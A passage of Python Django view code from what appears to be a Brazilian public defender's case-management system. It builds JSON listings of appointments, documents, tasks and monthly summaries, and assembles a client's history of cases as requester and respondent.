'responsavel': a.responsavel_nome,\r\n                        'defensoria': a.defensoria_origem_nome if a.tipo == Atendimento.TIPO_NUCLEO else a.defensoria_nome,  # noqa: E501\r\n                        'nucleo': a.nucleo_nome,\r\n                        'apoio': True if a.tipo == Atendimento.TIPO_NUCLEO else False,\r\n                        'liberado': True if a.liberado_por_nome is not None else False,\r\n                        'qualificacao': a.qualificacao_nome,\r\n                        'area': a.area_nome,\r\n                        'agendado': True if a.data_agendamento else False,\r\n                        'realizado': True if a.data_atendimento else False,\r\n                        'distribuido': True if a.responsavel_nome and not atendimento_online else False,\r\n                        'atrasado': True if a.data_agendamento and a.data_agendamento < datetime.now() else False,\r\n                        'prazo': a.prazo,\r\n                        'prioridade': a.prioridade,\r\n                        'cadastrado_por': a.cadastrado_por_nome,\r\n                        'liberado_por': a.liberado_por_nome,\r\n                        'atendido_por': a.atendido_por_nome,\r\n                        'em_atendimento': {\r\n                            'servidor': cron.servidor.nome if cron.servidor else None,\r\n                            'servidor_id': cron.servidor.id if cron.servidor else None,\r\n                            'data_inicio': cron.inicio\r\n                        } if cron else None,\r\n                        'historico_agendamento': a.historico_agendamento\r\n                    })\r\n\r\n                return JsonResponse(dados, safe=False)\r\n            else:\r\n                mensagem = 'Não há atuação/lotação para o dia selecionado'\r\n                sucesso = True\r\n\r\n    return JsonResponse({'success': sucesso, 'mensagem': mensagem})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index_get_documentos(request):\r\n\r\n    if request.method == 'POST' and request.is_ajax():\r\n\r\n        dados = simplejson.loads(request.body)\r\n\r\n        if hasattr(request.user.servidor, 'defensor'):\r\n\r\n            defensor = request.user.servidor.defensor\r\n\r\n            try:\r\n                inicio = 
datetime.strptime(dados['data'][:10], '%Y-%m-%d')\r\n except KeyError:\r\n inicio = date.today()\r\n\r\n termino = datetime.combine(inicio, time.max)\r\n semana_anterior = inicio.fromordinal(inicio.toordinal() - 7)\r\n\r\n if request.session.get('comarca'):\r\n comarca = Comarca.objects.get(id=request.session['comarca'])\r\n else:\r\n comarca = request.user.servidor.comarca.id\r\n\r\n nucleo = request.session.get('nucleo')\r\n\r\n # DOCUMENTOS\r\n if nucleo:\r\n defensorias = defensor.atuacoes(vigentes=True).filter(defensoria__nucleo=nucleo)\r\n else:\r\n defensorias = defensor.atuacoes(vigentes=True).filter(defensoria__comarca=comarca)\r\n\r\n defensorias = set(defensorias.values_list('defensoria_id', flat=True))\r\n\r\n documentos = AtendimentoDocumento.objects.filter(\r\n Q(atendimento__defensor__defensoria__in=defensorias) &\r\n (\r\n (\r\n Q(atendimento__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__partes__responsavel=True) &\r\n Q(atendimento__partes__ativo=True)\r\n ) |\r\n (\r\n Q(atendimento__inicial__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__inicial__partes__responsavel=True) &\r\n Q(atendimento__inicial__partes__ativo=True)\r\n )\r\n ) &\r\n (\r\n (\r\n Q(documento_online_id=None) &\r\n (\r\n Q(analisar=True) |\r\n Q(data_enviado=None) |\r\n Q(data_enviado__range=[semana_anterior, termino])\r\n )\r\n ) |\r\n (\r\n ~Q(prazo_resposta=None) &\r\n Q(status_resposta=AtendimentoDocumento.STATUS_RESPOSTA_PENDENTE)\r\n )\r\n ) &\r\n Q(atendimento__ativo=True) &\r\n Q(ativo=True)\r\n ).order_by(\r\n 'prazo_resposta',\r\n '-data_enviado',\r\n 'data_cadastro'\r\n ).values(\r\n 'id',\r\n 'nome',\r\n 'arquivo',\r\n 'atendimento__numero',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__inicial__partes__pessoa__nome',\r\n 'atendimento__partes__pessoa__nome_social',\r\n 'atendimento__inicial__partes__pessoa__nome_social',\r\n 'data_cadastro',\r\n 'data_enviado',\r\n 'arquivo',\r\n 'cadastrado_por_id',\r\n 'cadastrado_por__nome',\r\n 'enviado_por_id',\r\n 'enviado_por__nome',\r\n 'documento_online_id',\r\n 'prazo_resposta',\r\n 'analisar',\r\n )\r\n\r\n dados = []\r\n for a in documentos:\r\n requerente = None\r\n if a['atendimento__partes__pessoa__nome_social']:\r\n requerente = a['atendimento__partes__pessoa__nome_social']\r\n elif a['atendimento__inicial__partes__pessoa__nome_social']:\r\n requerente = a['atendimento__inicial__partes__pessoa__nome_social']\r\n elif a['atendimento__partes__pessoa__nome']:\r\n requerente = a['atendimento__partes__pessoa__nome']\r\n else:\r\n requerente = a['atendimento__inicial__partes__pessoa__nome']\r\n dados.append({\r\n 'id': a['id'],\r\n 'nome': a['nome'],\r\n 'arquivo': a['arquivo'],\r\n 'atendimento_numero': a['atendimento__numero'],\r\n 'requerente': requerente,\r\n 'enviado': True if a['data_enviado'] or a['documento_online_id'] else False,\r\n 'prazo': True if a['prazo_resposta'] else False,\r\n 'prazo_resposta': a['prazo_resposta'],\r\n 'prazo_resposta_dias': (a['prazo_resposta'].date() - date.today()).days if a['prazo_resposta'] else None, # noqa: E501\r\n 'data_cadastro': a['data_cadastro'],\r\n 'data_enviado': a['data_enviado'],\r\n 'cadastrado_por_id': a['cadastrado_por_id'],\r\n 'cadastrado_por_nome': a['cadastrado_por__nome'],\r\n 'enviado_por_id': a['enviado_por_id'],\r\n 'enviado_por_nome': a['enviado_por__nome'],\r\n 'documento_online_id': a['documento_online_id'],\r\n 'analisar': a['analisar'],\r\n })\r\n\r\n return JsonResponse(dados, safe=False)\r\n\r\n return 
JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index_get_resumo(request):\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n dados = simplejson.loads(request.body)\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n\r\n defensor = request.user.servidor.defensor\r\n defensorias = set(defensor.atuacoes(vigentes=True).values_list('defensoria_id', flat=True))\r\n\r\n try:\r\n inicio = datetime.strptime(dados['data'][:10], '%Y-%m-%d')\r\n except KeyError:\r\n inicio = date.today()\r\n\r\n if request.session.get('comarca'):\r\n comarca = Comarca.objects.get(id=request.session['comarca'])\r\n else:\r\n comarca = request.user.servidor.comarca\r\n\r\n nucleo = request.session.get('nucleo')\r\n\r\n dia_semana, dias_mes = calendar.monthrange(inicio.year, inicio.month)\r\n\r\n # AGENDAMENTOS\r\n\r\n agendamentos = []\r\n for dia in range(dias_mes):\r\n agendamentos.append({'dia': dia + 1, 'pauta': 0, 'extra': 0})\r\n\r\n if nucleo:\r\n atendimentos = AtendimentoDefensor.objects.filter(\r\n defensoria__nucleo=nucleo,\r\n tipo__in=[1, 2, 4, 9])\r\n else:\r\n atendimentos = AtendimentoDefensor.objects.filter(\r\n defensoria__comarca=comarca,\r\n defensoria__nucleo=None,\r\n tipo__in=[1, 2, 4, 9])\r\n\r\n if defensor.eh_defensor:\r\n atendimentos = atendimentos.filter(\r\n (\r\n (\r\n Q(defensor=defensor)\r\n & Q(substituto=None)\r\n ) |\r\n Q(substituto=defensor)\r\n ) &\r\n Q(remarcado=None) &\r\n Q(ativo=True)\r\n )\r\n elif nucleo and nucleo.supervisionado:\r\n atendimentos = atendimentos.filter(\r\n Q(responsavel=defensor) &\r\n Q(remarcado=None) &\r\n Q(ativo=True)\r\n )\r\n else:\r\n atendimentos = atendimentos.filter(\r\n Q(defensoria__in=defensorias) &\r\n Q(remarcado=None) &\r\n Q(ativo=True)\r\n )\r\n\r\n for dias in atendimentos.extra(\r\n select={\r\n 'day': \"DATE_PART('day', atendimento_atendimento.data_agendamento)\",\r\n 'hour': \"DATE_PART('hour', atendimento_atendimento.data_agendamento)\",\r\n 'minute': \"DATE_PART('minute', atendimento_atendimento.data_agendamento)\"\r\n }\r\n ).values(\r\n 'day', 'hour', 'minute'\r\n ).annotate(\r\n # noqa\r\n Count('id')\r\n ).filter(\r\n data_agendamento__year=inicio.year,\r\n data_agendamento__month=inicio.month\r\n ).order_by('day'):\r\n\r\n dia = int(dias['day'] - 1)\r\n\r\n if dias['hour'] or dias['minute']:\r\n agendamentos[dia]['pauta'] += dias['id__count']\r\n else:\r\n agendamentos[dia]['extra'] += dias['id__count']\r\n\r\n # AUDIENCIAS\r\n\r\n audiencias = []\r\n for dia in range(dias_mes):\r\n audiencias.append({'dia': dia + 1, 'marcadas': 0, 'realizadas': 0, 'canceladas': 0})\r\n\r\n # Filtro base para audiências\r\n q_audiencias = Q()\r\n q_audiencias &= Q(tipo__audiencia=True)\r\n q_audiencias &= Q(data_protocolo__year=inicio.year)\r\n q_audiencias &= Q(data_protocolo__month=inicio.month)\r\n q_audiencias &= Q(ativo=True)\r\n\r\n # TODO: Unificar filtros defensor e assessor (ver impacto onde tem vários defensores na mesma defensoria)\r\n # Se defensor, vê apenas suas audiências na comarca\r\n if defensor.eh_defensor:\r\n q_audiencias &= Q(defensor_cadastro=defensor)\r\n # Se assessor, vê audiêcias de todas as defensorias onde está lotado\r\n else:\r\n q_audiencias &= Q(defensoria__in=defensorias)\r\n\r\n # TODO: Aplicar este filtro na variável defensorias (replicar pra toda view)\r\n if nucleo:\r\n q_audiencias &= Q(defensoria__nucleo=nucleo)\r\n else:\r\n q_audiencias &= Q(defensoria__comarca=comarca)\r\n\r\n audiencias_lst = 
Audiencia.objects.extra(\r\n select={'day': \"DATE_PART('day', data_protocolo)\"}\r\n ).values(\r\n 'day',\r\n 'audiencia_status'\r\n ).annotate(\r\n Count('id')\r\n ).filter(\r\n q_audiencias\r\n ).order_by('day')\r\n\r\n for dias in audiencias_lst:\r\n\r\n dia = int(dias['day'] - 1)\r\n\r\n if dias['audiencia_status'] == 0:\r\n audiencias[dia]['marcadas'] = dias['id__count']\r\n elif dias['audiencia_status'] == 1:\r\n audiencias[dia]['realizadas'] = dias['id__count']\r\n elif dias['audiencia_status'] == 2:\r\n audiencias[dia]['canceladas'] = dias['id__count']\r\n\r\n return JsonResponse({\r\n 'agendamentos': agendamentos,\r\n 'audiencias': audiencias,\r\n 'ativar_acompanhamento_processo': config.ATIVAR_ACOMPANHAMENTO_PROCESSO,\r\n })\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index_get_tarefas(request):\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n dados = simplejson.loads(request.body)\r\n\r\n tarefas = Tarefa.objects.none() # Consulta vazia é retornada por padrão\r\n atuacoes = Atuacao.objects.none() # Consulta vazia é retornada por padrão\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n\r\n defensor = request.user.servidor.defensor\r\n\r\n try:\r\n inicio = datetime.strptime(dados['data'][:10], '%Y-%m-%d')\r\n except KeyError:\r\n inicio = date.today()\r\n\r\n termino = datetime.combine(inicio, time.max)\r\n\r\n # Atuacoes vigentes para o dia\r\n atuacoes = Atuacao.objects.vigentes_por_defensor(defensor=defensor, inicio=inicio)\r\n atuacoes = set(atuacoes.values_list('defensoria', flat=True))\r\n\r\n # filtro geral\r\n q = (\r\n Q(origem=None) &\r\n ~Q(\r\n Q(titulo='Solicitação de Apoio Respondida') &\r\n Q(responsavel=None) &\r\n Q(data_inicial=None) &\r\n Q(data_final=None)\r\n ) &\r\n (\r\n Q(movimento__isnull=False) |\r\n (\r\n Q(atendimento__ativo=True) &\r\n (\r\n (\r\n Q(atendimento__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__partes__responsavel=True) &\r\n Q(atendimento__partes__ativo=True)\r\n ) |\r\n (\r\n Q(atendimento__inicial__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__inicial__partes__responsavel=True) &\r\n Q(atendimento__inicial__partes__ativo=True)\r\n )\r\n )\r\n )\r\n ) &\r\n (\r\n Q(all_respostas=None) |\r\n (\r\n ~Q(all_respostas__finalizado=None) &\r\n Q(all_respostas__ativo=True)\r\n )\r\n )\r\n )\r\n\r\n # Configuração para exibir ou não as cooperações cumpridas\r\n if not config.EXIBIR_COOPERACOES_CUMPRIDAS_PARA_RESPONSAVEL:\r\n q &= ~Q(\r\n Q(prioridade=Tarefa.PRIORIDADE_COOPERACAO) &\r\n Q(status=Tarefa.STATUS_CUMPRIDO) &\r\n Q(setor_responsavel__in=atuacoes)\r\n )\r\n\r\n # filtro do usuário\r\n qs = Q()\r\n\r\n # tarefas com resposta para as atuações vigentes\r\n qs |= Q(resposta_para__in=atuacoes)\r\n\r\n if defensor.eh_defensor or request.user.is_superuser or request.user.has_perm(perm='atendimento.view_all_tarefas'): # noqa: E501\r\n\r\n # tarefas de atendimentos das atuações vigentes\r\n qs |= Q(setor_responsavel__in=atuacoes)\r\n\r\n # tarefas de atendimentos feitos no itinerante\r\n qs |= (\r\n Q(atendimento__defensor__defensoria__nucleo__itinerante=True) &\r\n Q(atendimento__defensor__defensor=defensor)\r\n )\r\n\r\n if config.HERDAR_TAREFAS_DOS_SUPERVISIONADOS:\r\n\r\n # Todos servidores vinculados as atuacoes do defensor\r\n servidores = set(Atuacao.objects.filter(\r\n defensoria__in=atuacoes\r\n ).vigentes().values_list('defensor__servidor_id', flat=True))\r\n\r\n qs |= 
Q(responsavel__in=servidores)\r\n\r\n else:\r\n\r\n qs |= Q(responsavel=defensor.servidor_id)\r\n\r\n else: # filtro-base analista\r\n\r\n # tarefas cadastradas pelo servidor\r\n qs |= Q(cadastrado_por=request.user.servidor)\r\n\r\n # tarefas onde o servidor é responsável\r\n qs |= Q(responsavel=request.user.servidor)\r\n\r\n # tarefas de atendimentos das atuações vigentes ou prioridade alerta\r\n qs |= Q(\r\n Q(setor_responsavel__in=atuacoes) &\r\n Q(prioridade__in=[Tarefa.PRIORIDADE_ALERTA, Tarefa.PRIORIDADE_COOPERACAO])\r\n )\r\n\r\n q &= qs\r\n\r\n tarefas = Tarefa.objects.ativos().filter(q).values(\r\n 'id',\r\n 'data_finalizado',\r\n 'data_final',\r\n 'data_inicial',\r\n 'prioridade',\r\n 'responsavel_id',\r\n 'responsavel__nome',\r\n 'setor_responsavel__nome',\r\n 'atendimento__nucleo__nome',\r\n 'titulo',\r\n 'status',\r\n 'atendimento__numero',\r\n 'atendimento__agenda',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__inicial__partes__pessoa__nome',\r\n 'atendimento__partes__pessoa__nome_social',\r\n 'atendimento__inicial__partes__pessoa__nome_social',\r\n 'movimento_id',\r\n 'movimento__procedimento__uuid',\r\n 'movimento__procedimento__numero',\r\n 'all_respostas__finalizado__nome',\r\n 'resposta_para',\r\n 'resposta_para__nome',\r\n 'visualizacoes'\r\n ).order_by(\r\n 'data_inicial', 'prioridade', 'data_final', 'id', '-all_respostas__id'\r\n ).distinct(\r\n 'data_inicial', 'prioridade', 'data_final', 'id'\r\n )\r\n\r\n dados = []\r\n\r\n # tarefas aguardando\r\n tarefas_ativas = tarefas.filter(\r\n (\r\n Q(data_final__gte=termino) |\r\n Q(data_final=None)\r\n ) &\r\n Q(data_finalizado=None) &\r\n Q(status=Tarefa.STATUS_CADASTRO)\r\n ).order_by(\r\n 'data_inicial',\r\n 'prioridade',\r\n 'data_final'\r\n )\r\n\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas_ativas,\r\n inicio, termino,\r\n Tarefa.TAREFA_AGUARDANDO,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n # tarefas atrasadas\r\n tarefas_atrasadas = tarefas.filter(\r\n data_finalizado=None,\r\n data_final__lt=inicio,\r\n status=Tarefa.STATUS_CADASTRO\r\n ).order_by(\r\n 'prioridade',\r\n '-data_final'\r\n )\r\n\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas_atrasadas,\r\n inicio,\r\n termino,\r\n Tarefa.TAREFA_ATRASADA,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n # tarefas com pendencias\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas.filter(data_finalizado=None, status=Tarefa.STATUS_PENDENTE),\r\n inicio,\r\n termino,\r\n Tarefa.TAREFA_PENDENCIA,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n tarefas_cumpridas = tarefas.filter(data_finalizado=None, status=Tarefa.STATUS_CUMPRIDO)\r\n\r\n if config.DIA_LIMITE_EXIBICAO_TAREFAS_CUMPRIDAS > 0:\r\n data_base = date.today() - timedelta(days=config.DIA_LIMITE_EXIBICAO_TAREFAS_CUMPRIDAS)\r\n tarefas_cumpridas = tarefas_cumpridas.filter(all_respostas__data_finalizado__gte=data_base)\r\n\r\n # tarefas cumpridas\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas_cumpridas,\r\n inicio,\r\n termino,\r\n Tarefa.TAREFA_CUMPRIDA,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n # tarefas finalizadas\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas.filter(data_finalizado__range=[inicio, termino]),\r\n inicio,\r\n termino,\r\n Tarefa.TAREFA_FINALIZADA,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n return JsonResponse(dados, safe=False)\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\ndef index_get_tarefas_to_array(arr, queryset, inicio, termino, status, atuacoes, servidor):\r\n\r\n for t in 
queryset:\r\n\r\n assistido = None\r\n if t['atendimento__partes__pessoa__nome_social']:\r\n assistido = t['atendimento__partes__pessoa__nome_social']\r\n elif t['atendimento__inicial__partes__pessoa__nome_social']:\r\n assistido = t['atendimento__inicial__partes__pessoa__nome_social']\r\n elif t['atendimento__partes__pessoa__nome']:\r\n assistido = t['atendimento__partes__pessoa__nome']\r\n else:\r\n assistido = t['atendimento__inicial__partes__pessoa__nome']\r\n\r\n arr.append({\r\n 'id': t['id'],\r\n 'ultima_resposta': t['all_respostas__finalizado__nome'],\r\n 'atendimento_numero': t['atendimento__numero'],\r\n 'nucleo': t['atendimento__nucleo__nome'],\r\n 'defensoria': t['setor_responsavel__nome'],\r\n 'titulo': t['titulo'],\r\n 'responsavel': t['responsavel__nome'],\r\n 'resposta_para': t['resposta_para__nome'],\r\n 'assistido': assistido,\r\n 'movimento': t['movimento_id'],\r\n 'propac_uuid': t['movimento__procedimento__uuid'],\r\n 'propac_numero': t['movimento__procedimento__numero'],\r\n 'prioridade': t['prioridade'],\r\n 'data_inicial': Util.date_to_json(t['data_inicial']) if t['data_inicial'] else None,\r\n 'data_final': Util.date_to_json(t['data_final']) if t['data_final'] else None,\r\n 'data_finalizado': Util.date_to_json(t['data_finalizado']) if t['data_finalizado'] else None,\r\n 'agenda': t['atendimento__agenda'],\r\n 'visualizada': bool(t['visualizacoes']),\r\n 'status': status,\r\n 'acompanhando': t['responsavel_id'] != servidor.id,\r\n 'eh_alerta': t['prioridade'] == Tarefa.PRIORIDADE_ALERTA,\r\n 'eh_cooperacao': t['prioridade'] == Tarefa.PRIORIDADE_COOPERACAO,\r\n 'eh_tarefa': t['prioridade'] not in (Tarefa.PRIORIDADE_ALERTA, Tarefa.PRIORIDADE_COOPERACAO)\r\n })\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar(request):\r\n\r\n if request.GET.get('next'):\r\n request.session['next'] = request.GET.get('next')\r\n\r\n if request.GET.get('pessoa_id'):\r\n request.session['pessoa_id'] = request.GET.get('pessoa_id')\r\n\r\n if request.GET.get('ligacao_numero'):\r\n ligacao = Atendimento.objects.get(numero=request.GET.get('ligacao_numero'))\r\n request.session['ligacao_id'] = ligacao.id\r\n return redirect('{}?ligacao_numero={}'.format(reverse('atendimento_listar'), ligacao.numero))\r\n else:\r\n return redirect('atendimento_listar')\r\n\r\n assistido = request.session.get('pessoa_id')\r\n\r\n # ATENDIMENTOS EXCLUIDOS\r\n atendimentos_excluidos = AtendimentoPessoa.objects.filter(\r\n pessoa=assistido,\r\n tipo=AtendimentoPessoa.TIPO_REQUERENTE,\r\n ativo=True,\r\n atendimento__tipo__in=[Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA],\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n atendimento__ativo=False,\r\n atendimento__partes__ativo=True,\r\n atendimento__partes__responsavel=True\r\n ).values(\r\n 'atendimento_id',\r\n 'atendimento__numero',\r\n 'atendimento__data_agendamento',\r\n 'atendimento__data_atendimento',\r\n 'atendimento__partes__tipo',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__defensor__defensor__servidor__nome',\r\n 'atendimento__defensor__defensoria__nome',\r\n 'atendimento__defensor__nucleo__nome',\r\n 'atendimento__qualificacao__titulo',\r\n 'atendimento__qualificacao__area__nome',\r\n 'atendimento__historico_recepcao',\r\n 'atendimento__agendado_por__nome',\r\n 'atendimento__data_cadastro',\r\n 'atendimento__historico',\r\n 'atendimento__atendido_por__nome',\r\n 'atendimento__data_exclusao',\r\n 'atendimento__motivo_exclusao',\r\n 'atendimento__excluido_por__nome',\r\n ).order_by(\r\n 
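# Atendimentos realizados mais recentes primeiro; empates seguem a data de agendamento e o número\r\n        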
'-atendimento__data_atendimento', 'atendimento__data_agendamento', 'atendimento__numero'\r\n )\r\n\r\n atendimentos = []\r\n for parte in atendimentos_excluidos:\r\n\r\n if not atendimentos or parte['atendimento__numero'] != atendimentos[-1]['numero']:\r\n atendimentos.append({\r\n 'numero': parte['atendimento__numero'],\r\n 'data_cadastro': parte['atendimento__data_cadastro'],\r\n 'data_agendamento': parte['atendimento__data_agendamento'],\r\n 'data_atendimento': parte['atendimento__data_atendimento'],\r\n 'defensor': parte['atendimento__defensor__defensor__servidor__nome'],\r\n 'defensoria': parte['atendimento__defensor__defensoria__nome'],\r\n 'nucleo': parte['atendimento__defensor__nucleo__nome'],\r\n 'qualificacao': parte['atendimento__qualificacao__titulo'],\r\n 'area': parte['atendimento__qualificacao__area__nome'],\r\n 'requerente': None,\r\n 'requerido': None,\r\n 'recepcao': None,\r\n 'agendado_por': parte['atendimento__agendado_por__nome'],\r\n 'historico_agendamento': parte['atendimento__historico_recepcao'],\r\n 'historico_defensor': parte['atendimento__historico'],\r\n 'atendido_por': parte['atendimento__atendido_por__nome'],\r\n 'data_exclusao': parte['atendimento__data_exclusao'],\r\n 'motivo_exclusao': parte['atendimento__motivo_exclusao'],\r\n 'excluido_por': parte['atendimento__excluido_por__nome'],\r\n })\r\n\r\n atendimentos[-1]['recepcao'] = Atendimento.objects.filter(\r\n origem=parte['atendimento_id'], tipo=Atendimento.TIPO_RECEPCAO, ativo=True\r\n ).values('data_atendimento', 'atendido_por__nome', 'historico').first()\r\n\r\n if parte['atendimento__partes__tipo'] == 0:\r\n atendimentos[-1]['requerente'] = parte['atendimento__partes__pessoa__nome']\r\n else:\r\n atendimentos[-1]['requerido'] = parte['atendimento__partes__pessoa__nome']\r\n\r\n atendimentos_excluidos = atendimentos\r\n\r\n # ATENDIMENTOS COMO REQUERENTE\r\n atendimentos_requerente = AtendimentoPessoa.objects.select_related(\"atendimento\").filter(\r\n pessoa=assistido,\r\n tipo=AtendimentoPessoa.TIPO_REQUERENTE,\r\n ativo=True,\r\n atendimento__tipo__in=[Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA],\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n atendimento__ativo=True,\r\n atendimento__partes__ativo=True,\r\n atendimento__partes__responsavel=True\r\n ).values(\r\n 'atendimento_id',\r\n 'atendimento__numero',\r\n 'atendimento__data_agendamento',\r\n 'atendimento__data_atendimento',\r\n 'atendimento__partes__tipo',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__defensor__defensor__servidor__nome',\r\n 'atendimento__defensor__defensoria__nome',\r\n 'atendimento__defensor__defensoria__atuacao',\r\n 'atendimento__defensor__nucleo__nome',\r\n 'atendimento__qualificacao__titulo',\r\n 'atendimento__qualificacao__area__nome',\r\n 'atendimento__historico_recepcao',\r\n 'atendimento__agendado_por__nome',\r\n 'atendimento__data_cadastro',\r\n 'atendimento__historico',\r\n 'atendimento__atendido_por__nome',\r\n ).order_by(\r\n '-atendimento__data_atendimento', 'atendimento__data_agendamento', 'atendimento__numero'\r\n )\r\n\r\n atendimentos = []\r\n arquivados_status = {}\r\n\r\n if arquivamento_esta_habilitado():\r\n # TODO verificar possibilidade de refatorar o status arquivado de property\r\n # para uma coluna física a fim de otimizar as consultas\r\n atendimentos_numeros = [atendimento['atendimento__numero'] for atendimento in atendimentos_requerente]\r\n arquivados_status = consulta_status_arquivado(atendimentos_numeros) or dict()\r\n\r\n for parte in 
atendimentos_requerente:\r\n\r\n if not atendimentos or parte['atendimento__numero'] != atendimentos[-1]['numero']:\r\n\r\n atendimentos.append({\r\n 'numero': parte['atendimento__numero'],\r\n 'data_cadastro': parte['atendimento__data_cadastro'],\r\n 'data_agendamento': parte['atendimento__data_agendamento'],\r\n 'data_atendimento': parte['atendimento__data_atendimento'],\r\n 'defensor': parte['atendimento__defensor__defensor__servidor__nome'],\r\n 'atuacao': parte['atendimento__defensor__defensoria__atuacao'],\r\n 'defensoria': parte['atendimento__defensor__defensoria__nome'],\r\n 'nucleo': parte['atendimento__defensor__nucleo__nome'],\r\n 'qualificacao': parte['atendimento__qualificacao__titulo'],\r\n 'area': parte['atendimento__qualificacao__area__nome'],\r\n 'requerente': None,\r\n 'requerido': None,\r\n 'recepcao': None,\r\n 'agendado_por': parte['atendimento__agendado_por__nome'],\r\n 'historico_agendamento': parte['atendimento__historico_recepcao'],\r\n 'historico_defensor': parte['atendimento__historico'],\r\n 'atendido_por': parte['atendimento__atendido_por__nome'],\r\n 'atendimento_principal_arquivado': arquivados_status.get(parte['atendimento__numero'], False)\r\n })\r\n\r\n atendimentos[-1]['recepcao'] = Atendimento.objects.filter(\r\n origem=parte['atendimento_id'], tipo=Atendimento.TIPO_RECEPCAO, ativo=True\r\n ).values('data_atendimento', 'atendido_por__nome', 'historico').first()\r\n\r\n if parte['atendimento__partes__tipo'] == 0:\r\n atendimentos[-1]['requerente'] = parte['atendimento__partes__pessoa__nome']\r\n else:\r\n atendimentos[-1]['requerido'] = parte['atendimento__partes__pessoa__nome']\r\n\r\n atendimentos_como_requerente = atendimentos\r\n\r\n # ATENDIMENTOS COMO NÃO HIPOSSUFICIÊNCIA\r\n indeferimentos = Indeferimento.objects.annotate(\r\n recursos=Sum(\r\n Case(\r\n When(processo__eventos__tipo__tipo=CoreTipoEvento.TIPO_RECURSO, then=1),\r\n output_field=IntegerField()\r\n ))\r\n ).filter(\r\n Q(pessoa=assistido) &\r\n Q(processo__desativado_em=None) &\r\n Q(processo__classe__tipo=CoreClasse.TIPO_NEGACAO_HIPOSSUFICIENCIA) &\r\n Q(\r\n Q(recursos=0) |\r\n Q(resultado=Indeferimento.RESULTADO_INDEFERIDO)\r\n )\r\n )\r\n\r\n # ATENDIMENTOS COMO REQUERIDO\r\n atendimentos_requerido = AtendimentoPessoa.objects.filter(\r\n pessoa=assistido,\r\n tipo=AtendimentoPessoa.TIPO_REQUERIDO,\r\n ativo=True,\r\n atendimento__tipo__in=[Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA],\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n atendimento__ativo=True,\r\n atendimento__partes__ativo=True,\r\n atendimento__partes__responsavel=True\r\n ).values(\r\n 'atendimento__numero',\r\n 'atendimento__data_agendamento',\r\n 'atendimento__data_atendimento',\r\n 'atendimento__partes__tipo',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__defensor__defensor__servidor__nome',\r\n 'atendimento__defensor__defensoria__nome',\r\n 'atendimento__defensor__nucleo__nome',\r\n 'atendimento__qualificacao__titulo',\r\n 'atendimento__qualificacao__area__nome',\r\n ).order_by(\r\n '-atendimento__data_atendimento', 'atendimento__data_agendamento', 'atendimento__numero'\r\n )\r\n\r\n atendimentos = []\r\n for parte in atendimentos_requerido:\r\n\r\n if not atendimentos or parte['atendimento__numero'] != atendimentos[-1]['numero']:\r\n atendimentos.append({\r\n 'numero': parte['atendimento__numero'],\r\n 'data_agendamento': parte['atendimento__data_agendamento'],\r\n 'data_atendimento': parte['atendimento__data_atendimento'],\r\n 'defensor': 
parte['atendimento__defensor__defensor__servidor__nome'],\r\n 'defensoria': parte['atendimento__defensor__defensoria__nome'],\r\n 'nucleo': parte['atendimento__defensor__nucleo__nome'],\r\n 'qualificacao': parte['atendimento__qualificacao__titulo'],\r\n 'area': parte['atendimento__qualificacao__area__nome'],\r\n 'requerente': None,\r\n 'requerido': None\r\n })\r\n\r\n if parte['atendimento__partes__tipo'] == 0:\r\n atendimentos[-1]['requerente'] = parte['atendimento__partes__pessoa__nome']\r\n else:\r\n atendimentos[-1]['requerido'] = parte['atendimento__partes__pessoa__nome']\r\n\r\n atendimentos_como_requerido = atendimentos\r\n\r\n # PROCESSOS\r\n atendimentos_processo = AtendimentoPessoa.objects.filter(\r\n pessoa=assistido,\r\n tipo=AtendimentoPessoa.TIPO_REQUERENTE,\r\n ativo=True,\r\n atendimento__tipo=Atendimento.TIPO_PROCESSO,\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n atendimento__ativo=True,\r\n atendimento__partes__ativo=True,\r\n atendimento__partes__responsavel=True\r\n ).values(\r\n 'atendimento__numero',\r\n 'atendimento__data_agendamento',\r\n 'atendimento__data_atendimento',\r\n 'atendimento__partes__tipo',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__defensor__parte__parte',\r\n 'atendimento__defensor__parte__data_cadastro',\r\n 'atendimento__defensor__parte__processo__tipo',\r\n 'atendimento__defensor__parte__processo__numero',\r\n 'atendimento__defensor__parte__processo__acao__nome',\r\n 